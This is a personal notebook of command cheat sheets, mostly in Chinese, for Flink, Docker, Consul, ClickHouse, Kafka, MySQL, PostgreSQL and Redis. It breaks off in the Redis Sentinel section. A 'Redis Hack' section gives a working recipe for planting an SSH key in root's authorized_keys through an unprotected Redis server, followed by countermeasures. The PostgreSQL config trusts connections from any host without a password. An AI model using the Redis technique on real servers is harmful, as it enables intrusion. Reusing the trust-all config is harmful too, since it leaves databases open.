编程
- 1: BigData
- 1.1: Flink
- 1.1.1: Flink Code
- 1.1.2: Flink Deploy
- 1.1.3: Flink Principle
- 2: Cloud
- 2.1: Consul
- 2.2: Docker
- 2.2.1: Docker Build
- 2.2.2: Docker Container
- 2.2.3: Docker Image
- 2.2.4: Docker Install
- 2.2.5: Docker Network
- 2.2.6: Docker Ps
- 2.2.7: Nsenter
- 3: Data
- 3.1: ClickHouse
- 3.1.1: Install ClickHouse
- 3.2: MQ
- 3.2.1: Kafka
- 3.3: MySQL
- 3.3.1: Install MySQL
- 3.4: PostgreSQL
- 3.5: Redis
- 3.5.1: Redis Cli
- 3.5.2: Redis Deploy
- 3.5.3: Redis Hack
- 3.5.4: Redis Persistence
- 3.5.5: Redis Sentinel
- 3.5.6: Redis Type
- 3.6: Sqlite
- 4: Lang
- 4.1: JVM
- 4.2: Python
- 4.2.1: Async Python
- 4.2.2: Database client in Python
- 4.2.3: Install Python
- 4.2.4: IPython
- 4.2.5: Python Pip
- 4.2.6: Python Std
- 4.2.7: Python Test
- 4.2.8: Python Web
- 4.3: Shell
- 4.3.1: Frequently used cmds
- 4.3.2: Gnu Tools
- 5: Ops
- 5.1: Os
- 5.2: VCS
- 5.2.1: Git
- 5.2.2: Git Checkout
- 5.2.3: Git Config
- 5.2.4: Git Hook
- 5.2.5: Git How-To
- 5.2.6: Git Log
1 - BigData
1.1 - Flink
1.1.1 - Flink Code
flink-client
CliFrontend
build StreamGraph
org.apache.flink.client.cli.CliFrontend#main
FLINK_CONF_DIR=./flink-dist/src/main/resources
# submit a job
run ./flink-examples/flink-examples-streaming/target/WordCount.jar
flink-runtime
StandaloneSessionClusterEntrypoint
run JobManager
org.apache.flink.runtime.entrypoint.StandaloneSessionClusterEntrypoint
-c ./flink-dist/src/main/resources
1.1.2 - Flink Deploy
Cluster
Starting a Session Cluster on Docker
# https://ci.apache.org/projects/flink/flink-docs-master/docs/deployment/resource-providers/standalone/docker/#starting-a-session-cluster-on-docker
FLINK_PROPERTIES="jobmanager.rpc.address: flink-jobmanager"
docker network create flink
# launch the JobManager
docker run -d \
--name=flink-jobmanager \
--network flink \
--publish 8081:8081 \
--env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
flink jobmanager
# one or more TaskManager containers
docker run -d \
--name=flink-taskmanager1 \
--network flink \
--env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
flink taskmanager
# submit a task
./bin/flink run ./examples/streaming/TopSpeedWindowing.jar
1.1.3 - Flink Principle
整体架构
Flink系统由Flink Program
、JobManager
、TaskManager
三个部分组成。这三部分之间都使用Akka框架(Actor System
)进行通信, 通过发送消息驱动任务的推进。
Flink Program
加载用户提交的任务代码,解析并生成任务执行拓扑图,并将拓扑图提交给JobManager
。
JobManager
基于任务执行拓扑图,生成相应的物理执行计划,将执行计划发送给TaskManager
执行。除此之外,JobManager
还负责协调checkpoint
的生成,不断地从TaskManager
收集Operator的状态,并周期性生成checkpoint
,以便在系统出错时从checkpoint
恢复之前的状态。
TaskManager
负责管理任务执行所需的资源,执行具体的任务,并将任务产出的数据流传入给下一个任务。每个TaskManger
上运行一个jvm进程。每个TaskSlot
运行一个线程
一致性保证与出错处理
分布式场景中,数据会丢失、会乱序、会重复。乱序的问题,结合Event Time
(表征事件发生的时间)与 Watermark
(表征何时数据已经完整的标识)解决。针对丢失和重复的问题,Flink通过分布式快照(distributed snapshot
),支持了Exactly Once
的一致性语义
分布式快照
Flink基于Chandy and Lamport
算法,实现分布式快照机制
在正常的数据流中,Flink会周期性插入一种特殊的数据记录 - barrier
,当算子处理到barrier
的时候,会保存算子当前的状态到持久性存储。当算子包含多个输入的时候,需要对齐多个barrier
(align barriers)。当算子某个输入率先接收到barrier
的时候,会缓存该输入的后续数据,直到所有的输入都收到barrier
之后,才会触发状态备份操作,并输出barrier
到下游算子。
除了备份各个算子的状态生成snapshot之外,对于sink还需要执行一步额外操作 —— 将结果写入外部设备。Flink通过两阶段提交的机制(2PC,two-phase commit), 来实现这个分布式事务。
流量控制
下游的InputChannel
从上游的ResultPartition
接收数据的时候,会基于当前已经缓存的数据量,以及可申请到的LocalBufferPool
与NetworkBufferPool
,计算出一个Credit
值返回给上游。上游基于Credit
的值,来决定发送多少数据。Credit
就像信用卡额度一样,不能超支。当下游发生数据拥塞时,Credit
减少值为0,于是上游停止数据发送。拥塞压力不断向上游传导,形成反压。
2 - Cloud
2.1 - Consul
install
docker run -d --name=consul1 \
-p 8500:8500 \
-e CONSUL_BIND_INTERFACE=eth0 \
consul
docker run -d --name consul2 -e CONSUL_BIND_INTERFACE=eth0 \
consul agent -dev -join=172.17.0.2
# query for all the members in the cluster
docker exec -t consul consul members
curl http://localhost:8500/v1/health/service/consul?pretty
2.2 - Docker
2.2.1 - Docker Build
build
docker build [OPTIONS] PATH | URL | -
# use Dockerfile in current path to build a image
docker build -t [repository]/[username]/[remote_image_name]:[tag] ./
# or
docker build -t [local_image_name] ./
docker image tag [local_image_name] [repository]/[username]/[remote_image_name]:[tag]
# finally
docker push [repository]/[username]/[remote_image_name]:[tag]
- -f, –file : Name of the Dockerfile
- –force-rm : Always remove intermediate containers
- –no-cache : Do not use cache when building the image
- –pull : Always attempt to pull a newer version of the image
- –quiet, -q : Only print image ID on success
- –tag, -t: Name and optionally a tag in the ’name:tag’ format
- –network: Set the networking mode for the RUN instructions during build (default “default”)
Dockerfile
ENV FOO=BAR
# cid=$(docker run -e FOO=BAR <image>)
# docker commit $cid
.dockerignore
.git
README.md
2.2.2 - Docker Container
run
# 创建一个守护态的Docker容器
docker run -itd ubuntu:14.04 /bin/bash
# docker ps
# 进入容器
docker attach <container_id>
# 当多个窗口同时使用该命令进入该容器时,所有的窗口都会同步显示
# enter a Docker container.
docker exec -it CONTAINER_NAME /bin/bash
# 创建一个新的容器并运行一个命令
docker run [OPTIONS] IMAGE [COMMAND] [ARG...]
OPTIONS说明:
- -a stdin: 指定标准输入输出内容类型,可选 STDIN/STDOUT/STDERR 三项;
- -d: 后台运行容器,并返回容器ID;
- -i: 以交互模式运行容器,通常与 -t 同时使用;
- -p: 端口映射,格式为:宿主端口:容器端口
- -v: 主机的目录映射到容器
- -t: 为容器重新分配一个伪输入终端,通常与 -i 同时使用;
- –name=“cname”: 为容器指定一个名称;
- –dns 8.8.8.8: 指定容器使用的DNS服务器,默认和宿主一致;
- –dns-search example.com: 指定容器DNS搜索域名,默认和宿主一致;
- -h “hostname”: 指定容器的hostname;
- -e property=value: 设置环境变量;
- –env-file=[]: 从指定文件读入环境变量;
- –cpuset=“0-2” or –cpuset=“0,1,2”: 绑定容器到指定CPU运行;
- **-m :**设置容器使用内存最大值;
- –net=“bridge”: 指定容器的网络连接类型,支持 bridge/host/none/container: 四种类型;
- –link=[]: 添加链接到另一个容器;
- –expose=[]: 开放一个端口或一组端口;
docker start # 启动一个或多少已经被停止的容器
docker stop # 停止一个运行中的容器
docker restart # 重启容器
docker pause # 暂停容器中所有的进程。
docker unpause # 恢复容器中所有的进程。
attach
# 确保CTRL-D或C TRL-C不会关闭容器
docker attach --sig-proxy=false
rm
OPTIONS说明:
- **-f :**通过SIGKILL信号强制删除一个运行中的容器
- **-l :**移除容器间的网络连接,而非容器本身
- -v :-v 删除与容器关联的卷
create
# 创建一个新的容器但不启动它
docker create [OPTIONS] IMAGE [COMMAND] [ARG...]
exec
# 在运行的容器中执行命令
docker exec [OPTIONS] CONTAINER COMMAND [ARG...]
# tty size
docker exec -it -e LINES=$(tput lines) -e COLUMNS=$(tput cols) <cid> bash
OPTIONS说明:
- **-d :**分离模式: 在后台运行
- **-i :**即使没有附加也保持STDIN 打开
- **-t :**分配一个伪终端
kill
# Kill one or more running containers
# <signal>
# KILL
docker kill -s <signal>
cp
docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH
2.2.3 - Docker Image
search
# --limit int Max number of search results (default 25)
# --no-trunc Don't truncate output
docker search <something>
pull
docker pull debian
# daemon mode
container_id=`docker run -itd debian /bin/bash `
docker exec -it $container_id /bin/bash
docker attach $container_id
push
docker commit <container_id> <image_name>
docker tag <image_name> <username>/<imagename>:<tagname>
docker login -u <username> -p <password>
docker push <username>/<imagename>:<tagname>
docker logout
tag
docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]
commit
# Create a new image from a container's changes
docker commit <container_id> <image_name>
# -a, --author string Author
# -m, --message string Commit message
cid=$(docker run -e FOO=BAR <image>)
docker commit $cid
images
# -a, --all Show all images (default hides intermediate images)
# --digests Show digests
# --no-trunc Don't truncate output
# -q, --quiet Only show numeric IDs
docker images
rmi
# -f, --force
docker rmi [OPTIONS] IMAGE [IMAGE...]
history
# Show the history of an image
# --no-trunc Don't truncate output
docker history [OPTIONS] IMAGE
save
# Save one or more images to a tar archive
docker save -o <tar_file_name> <image>
load
# Load an image from a tar archive or STDIN。
docker load -i <tar_file_name>
dockertags.sh
#!/bin/bash
if [ $# -lt 1 ]
then
cat << HELP
dockertags -- list all tags for a Docker image on a remote registry.
EXAMPLE:
- list all tags for ubuntu:
dockertags ubuntu
- list all php tags containing apache:
dockertags php apache
HELP
fi
image="$1"
tags=`wget -q https://registry.hub.docker.com/v1/repositories/${image}/tags -O - | sed -e 's/[][]//g' -e 's/"//g' -e 's/ //g' | tr '}' '\n' | awk -F: '{print $3}'`
if [ -n "$2" ]
then
tags=` echo "${tags}" | grep "$2" `
fi
echo "${tags}"
2.2.4 - Docker Install
docker
docker-ce
# https://docs.docker.com/engine/install/debian/
sudo apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg \
lsb-release -y
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
"deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
$(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io
sudo systemctl status docker
sudo usermod -aG docker $USER
debian/ubuntu
sudo apt-get install docker.io
# order to perform docker without sudo prefix
sudo usermod -aG docker $USER
sudo systemctl start docker
sudo docker run --rm hello-world
sudo apt-get autoremove --purge docker-io
rm -rf /var/lib/docker
centos/fedora
sudo dnf install docker
# 启动 Docker 服务
# sudo service docker start
sudo systemctl start docker
docker run --rm hello-world
docker version
docker info
# 为避免输入sudo,可以把用户加入 Docker 用户组
sudo groupadd docker
sudo usermod -aG docker $USER
2.2.5 - Docker Network
--link
# source container
docker run --name mysql -e MYSQL_ROOT_PASSWORD=server -d mysql
# received container
# 在nginx的容器中,使用db或者aliasmysql作为连接地址来连接MySQL服务
docker run --name nginx --link mysql:aliasmysql -d nginx
docker将source container中定义的环境变量全部导入到received container中,在received container中可以通过环境变量来获取连接信息
通过给/etc/hosts中加入名称和IP的解析关系来实现
network
docker容器的网络有五种模式:
1)bridge模式,–net=bridge(默认) 这是dokcer网络的默认设置,为容器创建独立的网络命名空间,容器具有独立的网卡等所有单独的网络栈,是最常用的使用方式。 在docker run启动容器的时候,如果不加–net参数,就默认采用这种网络模式。安装完docker,系统会自动添加一个供docker使用的网桥docker0,我们创建一个新的容器时, 容器通过DHCP获取一个与docker0同网段的IP地址,并默认连接到docker0网桥,以此实现容器与宿主机的网络互通。
2)host模式,–net=host 这个模式下创建出来的容器,直接使用容器宿主机的网络命名空间。 将不拥有自己独立的Network Namespace,即没有独立的网络环境。它使用宿主机的ip和端口。
3)none模式,–net=none 为容器创建独立网络命名空间,但不为它做任何网络配置,容器中只有lo,用户可以在此基础上,对容器网络做任意定制。 这个模式下,dokcer不为容器进行任何网络配置。需要我们自己为容器添加网卡,配置IP。 因此,若想使用pipework配置docker容器的ip地址,必须要在none模式下才可以。
4)container模式,–net=container:NAME_or_ID 与host模式类似,只是容器将与指定的容器共享网络命名空间。 这个模式就是指定一个已有的容器,共享该容器的IP和端口。除了网络方面两个容器共享,其他的如文件系统,进程等还是隔离开的。容器可以相以localhost访问,构成一个统一的整体。
5)用户自定义:docker 1.9版本以后新增的特性,允许容器使用第三方的网络实现或者创建单独的bridge网络,提供网络隔离能力
在用户定义网络模式下,开发者可以使用任何docker支持的第三方网络driver来定制容器的网络。并且,docker 1.9以上的版本默认自带了bridge和overlay两种类型的自定义网络driver。可以用于集成calico、weave、openvswitch等第三方厂商的网络实现。
除了docker自带的bridge driver,其他的几种driver都可以实现容器的跨主机通信。而基于bdrige driver的网络,docker会自动为其创建iptables规则,保证与其他网络之间、与docker0之间的网络隔离。
WARNING: IPv4 forwarding is disabled. Networking will not work.
echo "net.ipv4.ip_forward=1" >>/usr/lib/sysctl.d/00-system.conf
systemctl restart network && systemctl restart docker
volume
backup
docker volume create data
docker run -v data:/path/to/data --name data_container \
-d -it --rm \
busybox /bin/sh
docker run --rm --volumes-from data_container -v $(pwd):/backup busybox tar cvf /backup/data_backup.tar path/to/data
restore
docker run -v data:/path/to/data --name data_container2 \
-d -it --rm \
busybox /bin/bash
docker run --rm --volumes-from data_container2 \
-v $(pwd):/backup busybox \
bash -c "cd /path/to/data && tar xvf /backup/data_backup.tar --strip 1"
2.2.6 - Docker Ps
ps
docker ps -a
# Show the latest created container, Only display numeric IDs
docker ps -lq
docker ps --format 'table {{.Names}}\t{{.Image}}'
vim ~/.docker/config.json.
{
"psFormat": "table {{.Names}}\\t{{.Image}}\\t{{.RunningFor}} ago\\t{{.Status}}\\t{{.Command}}",
"imagesFormat": "table {{.Repository}}\\t{{.Tag}}\\t{{.ID}}\\t{{.Size}}"
}
OPTIONS说明:
- **-a :**显示所有的容器,包括未运行的。
- **-f :**根据条件过滤显示的内容。
- **–format :**指定返回值的模板文件。
- **-l :**显示最近创建的容器。
- **-n :**列出最近创建的n个容器。
- **–no-trunc :**不截断输出。
- **-q :**静默模式,只显示容器编号。
- **-s :**显示总的文件大小。
inspect
# 显示容器的第一个进程的PID
docker inspect -f {{.State.Pid}} <container_id>
docker inspect --format='{{.RootFS.Layers}}' <image_id>
docker inspect --format='{{.NetworkSettings.IPAddress }}' <container_id>
获取容器/镜像的元数据
OPTIONS说明:
- **-f :**指定返回值的模板文件。
- **-s :**显示总的文件大小。
- **–type :**为指定类型返回JSON。
diff
docker diff <container_id>
top
查看容器中运行的进程信息
docker top [OPTIONS] CONTAINER [ps OPTIONS]
# 查看所有运行容器的进程信息
for i in `docker ps |grep Up|awk '{print $1}'`;do echo \ &&docker top $i; done
logs
获取容器的日志
docker logs [OPTIONS] CONTAINER
tail -f /var/lib/docker/containers/<cid>/<cid>-json.log
# 用 fluentd 收集容器日志
docker run -d \
--log-driver=fluentd \
--log-opt fluentd-address=${fluentd_address} \
--log-opt tag="docker.{{.Name}}" \
nginx
OPTIONS说明:
- -f : 跟踪日志输出
- **–since :**显示某个开始时间的所有日志
- -t : 显示时间戳
- **–tail :**仅列出最新N条容器日志
Docker 引擎日志
Ubuntu(14.04) /var/log/upstart/docker.log Ubuntu(16.04) journalctl -u docker.service CentOS 7/RHEL 7/Fedora journalctl -u docker.service CoreOS journalctl -u docker.service OpenSuSE journalctl -u docker.service OSX ~/Library/Containers/com.docker.docker/Data/com.docker.driver.amd64-linux/log/docker.log Debian GNU/Linux 7 /var/log/daemon.log Debian GNU/Linux 8 journalctl -u docker.service Boot2Docker /var/log/docker.log
events
从服务器获取实时事件
docker events [OPTIONS]
OPTIONS说明:
- **-f :**根据条件过滤事件;
- **–since :**从指定的时间戳后显示所有事件; –since=“2016-07-01”
- **–until :**流水时间显示到指定的时间为止;
export
将文件系统作为一个tar归档文件导出到STDOUT。
docker export [OPTIONS] CONTAINER
OPTIONS说明:
- **-o :**将输入内容写到文件。
wait
阻塞运行直到容器停止,然后打印出它的退出代码。
docker wait CONTAINER [CONTAINER...]
port
列出指定的容器的端口映射,或者查找将PRIVATE_PORT NAT到面向公众的端口
docker port CONTAINER [PRIVATE_PORT[/PROTO]]
$
# Delete all containers
docker rm $(docker ps -a -q)
# Delete all images
docker rmi $(docker images -q)
/var/lib/docker
- /var/lib/docker/devicemapper/devicemapper/data #用来存储相关的存储池数据
- /var/lib/docker/devicemapper/devicemapper/metadata #用来存储相关的元数据。
- /var/lib/docker/devicemapper/metadata/ #用来存储 device_id. 大小. 以及传输_id. 初始化信息
- /var/lib/docker/devicemapper/mnt #用来存储挂载信息
- /var/lib/docker/container/ #用来存储容器信息
- /var/lib/docker/graph/ #用来存储镜像中间件及本身详细信息和大小 . 以及依赖信息
- /var/lib/docker/repositores-devicemapper #用来存储镜像基本信息
- /var/lib/docker/tmp #docker临时目录
- /var/lib/docker/trust #docker信任目录
- /var/lib/docker/volumes #docker卷目录
2.2.7 - Nsenter
nsenter
wget https://www.kernel.org/pub/linux/utils/util-linux/v2.32/util-linux-2.32.tar.gz
tar -zxf util-linux-2.32.tar.gz && cd util-linux-2.32
./configure
make
# make && make install,可能影响操作系统底层工具
cp nsenter /usr/local/bin/
docker-enter
#!/bin/sh
if [ -e $(dirname "$0")/nsenter ]; then
# with boot2docker, nsenter is not in the PATH but it is in the same folder
NSENTER=$(dirname "$0")/nsenter
else
NSENTER=nsenter
fi
if [ -z "$1" ]; then
echo "Usage: $(basename "$0") CONTAINER [COMMAND [ARG]...]"
echo ""
echo "Enters the Docker CONTAINER and executes the specified COMMAND."
echo "If COMMAND is not specified, runs an interactive shell in CONTAINER."
else
PID=$(docker inspect --format "{{.State.Pid}}" "$1")
if [ -z "$PID" ]; then
exit 1
fi
shift
OPTS="--target $PID --mount --uts --ipc --net --pid --"
if [ -z "$1" ]; then
# No command given.
# Use su to clear all host environment variables except for TERM,
# initialize the environment variables HOME, SHELL, USER, LOGNAME, PATH,
# and start a login shell.
"$NSENTER" $OPTS su - root
else
# Use env to clear all host environment variables.
"$NSENTER" $OPTS env --ignore-environment -- "$@"
fi
fi
3 - Data
3.1 - ClickHouse
3.1.1 - Install ClickHouse
docker
docker run -d --name clickhouse \
--ulimit nofile=262144:262144 \
-p 8123:8123 -p9000:9000 \
-e CLICKHOUSE_DB=test \
-e CLICKHOUSE_USER=root -e CLICKHOUSE_PASSWORD=root \
-e CLICKHOUSE_DEFAULT_ACCESS_MANAGEMENT=1 \
clickhouse/clickhouse-server
echo 'SELECT version()' | curl 'http://localhost:18123/' --data-binary @-
3.2 - MQ
3.2.1 - Kafka
install
# https://github.com/provectus/kafka-ui
docker run -p 8080:8080 \
-e KAFKA_CLUSTERS_0_NAME=local \
-e KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9092 \
-d provectuslabs/kafka-ui
3.3 - MySQL
3.3.1 - Install MySQL
Container
docker run -d -it --name mysql57 \
-e MYSQL_ROOT_PASSWORD=root \
-p 3306:3306 \
mysql:5.7
3.4 - PostgreSQL
install
container
# -e POSTGRES_USER=postgres \
# -e POSTGRES_DB=postgres \
docker run -d -it --name postgres15 \
-e POSTGRES_PASSWORD=postgres \
-v ${PWD}/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \
-v ${PWD}/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \
-v ${PWD}/data:/var/lib/postgresql/data \
-p 5432:5432 \
postgres:15
docker exec -it postgres15 psql -hlocalhost -U postgres
GRANT ALL PRIVILEGES ON DATABASE postgres to postgres;
ALTER SCHEMA public OWNER to postgres;
GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO postgres;
GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO postgres;
select name, setting from pg_settings where category = 'File Locations' ;
/var/lib/postgresql/data/pg_hba.conf
local all all trust
host all all 127.0.0.1/32 trust
host all all ::1/128 trust
local replication all trust
host replication all 127.0.0.1/32 trust
host replication all ::1/128 trust
host all all 0.0.0.0/0 trust
/var/lib/postgresql/data/postgresql.conf
listen_addresses = '*'
#port = 5432 # (change requires restart)
max_connections = 100
shared_buffers = 128MB
dynamic_shared_memory_type = posix
max_wal_size = 1GB
min_wal_size = 80MB
log_timezone = 'Etc/UTC'
datestyle = 'iso, mdy'
timezone = 'Etc/UTC'
lc_messages = 'en_US.utf8'
lc_monetary = 'en_US.utf8'
lc_numeric = 'en_US.utf8'
lc_time = 'en_US.utf8'
default_text_search_config = 'pg_catalog.english'
3.5 - Redis
3.5.1 - Redis Cli
事务
multi
开启事务exec
提交事务,执行队列中的所有命令discard
放弃执行事务,清空事务队列watch key1 [key2...]
监听某个键,如果在exec之前被更改了,则放弃执行事务unwatch [key1...]
取消目前对键的监视,客户端断开连接也会取消监视
发布与订阅
subscribe key1 [key2...]
订阅频道,支持通配符的版本psubscribe
unsubscribe key1 [key2...]
取消订阅频道,支持通配符的版本punsubscribe
publish key value [key2...]
发布消息到频道pubsub
自省
类型操作
keys *
string
set k v
# string
type k
get k
# return old value
getset k v
mset k1 v1 k2 v2
mget k1 k2
# set if not exsit
msetnx k1 v1 k2 v2
# append to the tail
append k v
# string legnth
strlen k
# increment a number string, k++
incr k
decr k
# k += d
incrby k d
decrby k d
# 覆写,从偏移量offset 开始
setrange k offset v
# 子串,含两端
getrange k start end
# 设置或清除指定偏移量上的位
setbit k offset v
setnx k v
# expire in seconds
set k v ex seconds nx
list
# 将一个或多个值 value插入到列表 key 的表头
lpush k v1 v2
# push if exist
lpushx k v
# 返回列表 key 中指定区间内的元素,区间以偏移量 start=0 和 end=-1 指定
lrange key start end
# 移除并返回列表 key 的头元素
lpop k
llen k
# 从头部开始移除列表中与参数 value 相等的元素
lrem k count v
lset k index v
# 返回列表 key 中,下标为 index 的元素
lindex k index
# 修剪
ltrim k start end
# 将值 value 插入到列表 key 当中,位于值 p 之前或之后 after
linsert k before p v
# 将一个或多个值 value插入到列表 key 的表尾
rpush k v1 v2
rpushx k v
rpop
# 在一个原子时间内,执行两个动作:
# 将列表 src 中的尾元素弹出返回,并插入到列表 dest
rpoplpush src dest
hash
hset k f v
# 将哈希表 key 中的域 field 的值设置为 value ,当且仅当域 field 不存在。
hsetnx k f v
hexists k f
hlen k
# 删除哈希表 key 中的一个或多个指定域,不存在的域将被忽略。
hdel k f1 f2
# ++
hincrby k f increment
hgetall k
# 返回哈希表 key 中的所有域
hkeys k
# 返回哈希表 key 中所有域的值
hvals k
# 同时将多个 field-value (域-值)对设置到哈希表 key 中
hmset k f1 v1 f2 v2
set
# 已经存在于集合的 member 元素将被忽略。
sadd k m1 m2
smembers k
# 集合中元素的数量
scard k
# 判断 member 元素是否集合 key 的成员
sismember k m
# 移除并返回集合中的一个随机元素
spop k
# 返回集合中的一个随机元素
srandmember k
# 移除集合 key 中的一个或多个member 元素,不存在的 member 元素会被忽略
srem k m1 m2
# 原子性操作 将 member 元素从 source 集合移动到 destination 集合
smove src dest m
sdiff set1 set2
sdiffstore diffSet set1 set2
sunion set1 set2
sinterstore interSet set1 set2
zset
zadd k score1 m1 score2 m2
zcard k
zincrby k increment m
# 返回有序集 key 中, score 值在 min 和 max 之间
# (默认包括 score 值等于 min 或 max )的成员的数量
zcount k min max
# 返回有序集 key 中,指定区间内的成员
# 其中成员的位置按 score 值递增(从小到大)来排序。
zrange k start end withscores
# 按 score 值递减(从大到小)
zrevrange k start end withscores
# 返回所有 score 值介于 min 和 max 之间
# (包括等于 min 或 max )的成员
zrangebyscore k min max withscores limit offset count
# 返回有序集 key 中成员 member 的排名
# 其中有序集成员按score 值递增(从小到大)顺序排列。
zrank k m
zrevrank k m
# 返回有序集 key 中,成员 member 的 score 值。
zscore k m
zrem k m1 m2
# 移除有序集 key 中,指定排名(rank)区间内的所有成员
zremrangebyrank k start end
zremrangebyscore k min max
info
info memory
used_memory, include used swap space
used_memory_human
used_memory_rss, same as top
or ps
, exclude used swap space
mem_fragmentation_ratio same as used_memory_rss / used_memory
fragmentation ratio
health value is 1.03 for jemalloc
mem_allocator libc, jemalloc or tcmalloc
3.5.2 - Redis Deploy
container
docker run -it -d --name redis -p 6379:6379 redis
sentinel
localhost
config set protected-mode no
multi master (3 master, 3 slave, and 3 sentinel)
cat << EOF > redis.conf
port 7000
daemonize yes
cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
$redis_server 7000/redis.conf
$redis_server 7001/redis.conf
$redis_server 7002/redis.conf
$redis_server 7003/redis.conf
$redis_server 7004/redis.conf
$redis_server 7005/redis.conf
# three master & three slave
../redis/src/redis-trib.rb create --replicas 1 127.0.0.1:7000 127.0.0.1:7001 \
127.0.0.1:7002 127.0.0.1:7003 127.0.0.1:7004 127.0.0.1:7005
cat << EOF > sentinel.conf
port 26379
daemonize yes
sentinel monitor mymaster1 127.0.0.1 %port1 2
sentinel down-after-milliseconds mymaster1 60000
sentinel failover-timeout mymaster1 180000
sentinel parallel-syncs mymaster1 1
sentinel monitor mymaster2 127.0.0.1 %port2 2
sentinel down-after-milliseconds mymaster2 60000
sentinel failover-timeout mymaster2 180000
sentinel parallel-syncs mymaster2 1
sentinel monitor mymaster3 127.0.0.1 %port3 2
sentinel down-after-milliseconds mymaster3 60000
sentinel failover-timeout mymaster3 180000
sentinel parallel-syncs mymaster3 1
EOF
cat sentinel.conf | sed s/26379/26379/g | sed 's/%port1/1/g' > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g | sed 's/%port2//g' > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g | sed 's/%port3//g' > sentinel_2.conf
export redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
single master(1 master, 5 slave, and 3 sentinel)
cat << EOF > redis.conf
port 7000
daemonize yes
protected-mode no
# cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
# master
$redis_server 7000/redis.conf
# slave
$redis_server 7001/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7002/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7003/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7004/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7005/redis.conf --slaveof 127.0.0.1 7000
cat << EOF > sentinel.conf
port 26379
daemonize yes
protected-mode no
sentinel monitor mymaster 127.0.0.1 7000 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
EOF
cat sentinel.conf | sed s/26379/26379/g > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g > sentinel_2.conf
redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
3.5.3 - Redis Hack
Remote login
How to replay
ssh-keygen –t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save
How to avoid
# redis.conf
# disable to change dbfilename via remote connetion
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
requirepass mypassword
bind 127.0.0.1
groupadd -r redis && useradd -r -g redis redis
3.5.4 - Redis Persistence
persistence
RDB
fork sub process periodically and dump to a single file
AOF, appended only file
log every writer and delete records
# after 300s, dump if at least 10 key changed
save 300 10
# aof, always no
# every second
appendfsync everysec
# grow 100% then rewrite
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
3.5.5 - Redis Sentinel
sentinel
ping
info replication
info server
info sentinel
sentinel auth-pass <name> <password>
sentinel masters
sentinel master <name>
sentinel slaves <name>
# 返回指定master的ip和端口
# 正在进行failover或者failover已经完成,将显示被提升为master的slave的ip和端口
sentinel get-master-addr-by-name <name>
# 重置名字匹配该正则表达式的所有的master的状态信息
sentinel reset <pattern>
# 执行failover,无需其他sentinel同意
sentinel failover <master name>
# 监听一个新的master
sentinel monitor <name> <ip> <port> <quorum>
# 放弃对某个master的监听
sentinel remove <name>
# 改变指定master的配置,支持多个<option> <value>
sentinel set <name> <option> <value>
conf
# 26379
redis-sentinel /path/to/sentinel.conf
redis-server /path/to/sentinel.conf --sentinel
sentinel.conf
sentinel monitor mymaster 127.0.0.1 6379 2 sentinel down-after-milliseconds mymaster 60000 sentinel failover-timeout mymaster 180000 sentinel parallel-syncs mymaster 1
sentinel monitor resque 192.168.1.3 6380 4 sentinel down-after-milliseconds resque 10000 sentinel failover-timeout resque 180000 sentinel parallel-syncs resque 5
sentinel monitor mymaster 127.0.0.1 6379 2
2 当集群中有2个sentinel认为master死了时,才能真正认为该master已经不可用了
sentinel <option_name> <master_name> <option_value>
所有的配置都可以在运行时用命令SENTINEL SET command动态修改。
